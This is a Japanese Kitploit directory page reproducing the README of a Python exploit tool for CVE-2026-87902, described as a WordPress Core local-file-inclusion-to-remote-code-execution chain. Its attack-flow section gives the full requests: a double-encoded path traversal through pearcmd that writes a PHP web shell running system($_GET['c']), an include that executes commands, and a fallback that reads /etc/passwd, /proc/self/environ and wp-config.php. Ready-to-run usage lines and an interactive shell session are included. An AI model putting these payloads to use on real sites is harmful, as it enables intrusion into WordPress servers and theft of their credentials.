Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2026-87902 — CVE-2026-87902(WordPress CoreのLFIからRCEへのチェーン)用のPythonエクスプロイト。バージョンをフィンガープリントし、pearcmd経由でPHPシェルを書き込み、コマンド実行またはLFIフォールバックを提供します。 | Kitploit
ツール/GitHubGitHub/zyphorixofficialmain-lab/cve-2026-87902
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ポストエクスプロイトウェブセキュリティペネトレーションテストリモートアクセスツールペイロード開発
GitHubzyphorixofficialmain-lab/cve-2026-87902

cve-2026-87902

CVE-2026-87902(WordPress CoreのLFIからRCEへのチェーン)用のPythonエクスプロイト。バージョンをフィンガープリントし、pearcmd経由でPHPシェルを書き込み、コマンド実行またはLFIフォールバックを提供します。

リポジトリを見る
113時間8分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

cve-2026-87902

CVE-2026-87902 – WordPress Core LFIからRCEへのエクスプロイト (自動強制エディション)

maked by alfaris

⚠️ 法的警告 所有していないシステム、またはテストの書面による許可を得ていないシステムに対して使用することは違法であり、サイバー犯罪法により処罰されます。 作者は悪用に対して一切の責任を負いません。


📌 脆弱性の概要

項目値
CVECVE-2026-87902
種類ローカルファイルインクルージョン (LFI) → リモートコード実行 (RCE)
CWECWE-98
CVSS v3.19.2 (Critical)
攻撃ベクトルネットワーク (未認証)
影響を受けるバージョンWordPress 4.7.0 – 7.1.1
修正済みWordPress 7.1.2 (および 4.7.37 までのバックポート)
根本原因get_page_template() が pagename パラメータをURLデコードした後に validate_file() を呼び出さないため、二重エンコードされたトラバーサル (%252E%252E%252F) がサニタイズをバイパスし、テーマディレクトリ外の任意の .php ファイルをインクルードできる。

RCEの前提条件

完全なRCEには、以下のすべてが真である必要があります:

  1. WordPressのバージョンが 4.7.0 から 7.1.1 の間
  2. 有効なテーマにトップレベルの page-* ディレクトリが含まれている (例: page-templates/)
  3. 少なくとも1つの公開済みページが存在する
  4. pearcmd.php が存在し、Webサーバーユーザーが読み取り可能 (公式PHP Dockerイメージや、PHP < 8.5 の多くのcPanelインストールでデフォルト)
  5. PHPが register_argc_argv=On である (PHP < 8.5 でデフォルト)
  6. ホストOSが Linux である (Windowsのトラバーサル構文は異なる)

これらのいずれかが欠けている場合、エクスプロイトは LFIのみのファイル読み取り にフォールバックします。


📂 ファイル

exploit.py # メインエクスプロイトスクリプト README.md # このファイル report.json # (オプション) -o 使用時の出力レポート

⚙️ 要件

  • Python 3.8+
  • requests ライブラリ

インストール:

root@kitploit:~
apt update
apt upgrade
apt install python
apt install git
root@kitploit:~
pip install requests
root@kitploit:~
git clone https://github.com/zyphorixofficialmain-lab/cve-2026-87902
cd cve-2026-87902
  1. 基本スキャン (詳細表示)
root@kitploit:~
python3 exploit.py -t https://site.com -v

これにより以下を実行します:

· WordPressのバージョンと有効なテーマをフィンガープリント · 脆弱なバージョン範囲を検証 · 公開済みページIDを特定 (REST → sitemap → ブルートフォース) · pearcmd.php 経由でPHPシェルの書き込みを試行 · シェルをインクルードして id の実行を試行 · RCEが失敗した場合、機密ファイルに対するLFIにフォールバック

  1. 単一コマンドの実行
root@kitploit:~
python3 exploit.py -t https://site.com -c "id"
  1. インタラクティブシェル (RCEが成功した場合のみ)
root@kitploit:~
python3 exploit.py -t https://site.com -i -v

シェル内:

root@kitploit:~
wp$ id
wp$ uname -a
wp$ cat /etc/passwd
wp$ exit
  1. レポートをJSONに保存
root@kitploit:~
python3 exploit.py -t https://site.com -o report.json -v
  1. オプションの組み合わせ
root@kitploit:~
python3 exploit.py -t https://site.com -c "whoami" -o report.json -v

🧾 CLIリファレンス

フラグ ロング 説明 -t --target 必須。対象のWordPress URL (末尾のスラッシュなし)。 -c --command RCE後に単一のシェルコマンドを実行。 -i --interactive RCE後にインタラクティブシェルを開く。 -v --verbose 詳細な進行状況を表示。 -o --output 最終レポートを指定されたパスにJSONとして保存。 -h --help ヘルプを表示。

🔄 エクスプロイトの流れ

root@kitploit:~
[1] フィンガープリント
      ├─ WordPressバージョン (meta generator / asset ?ver=)
      └─ 有効なテーマ (/wp-content/themes/<name>/)

[2] バージョンチェック
      └─ 4.7.0 – 7.1.1 ? 続行 : 警告して続行

[3] ページIDの検索
      ├─ REST: /wp-json/wp/v2/pages
      ├─ Sitemap: /wp-sitemap.xml
      └─ ブルートフォース: /?page_id=1..30

[4] page-* ディレクトリのチェック
      ├─ page-templates
      ├─ page-template
      ├─ pages
      ├─ templates
      └─ page

[5] pearcmd経由でシェルを書き込み
      └─ POST /?+config-create+/&page_id=<id>&pagename=templates%252F..%252F..%252Fusr%252Flocal%252Flib%252Fphp%252Fpearcmd
         body: root=<?php system($_GET['c']); ?>

[6] シェルをインクルード
      └─ GET /?page_id=<id>&pagename=templates%252F..%252F..%252Ftmp%252F<shell>.php&c=id

[7] フォールバックLFI (RCEが失敗した場合)
      ├─ /etc/passwd
      ├─ /etc/hostname
      ├─ /proc/self/environ
      ├─ /proc/version
      ├─ wp-config.php
      └─ ../.. バリアント
ツールをダウンロード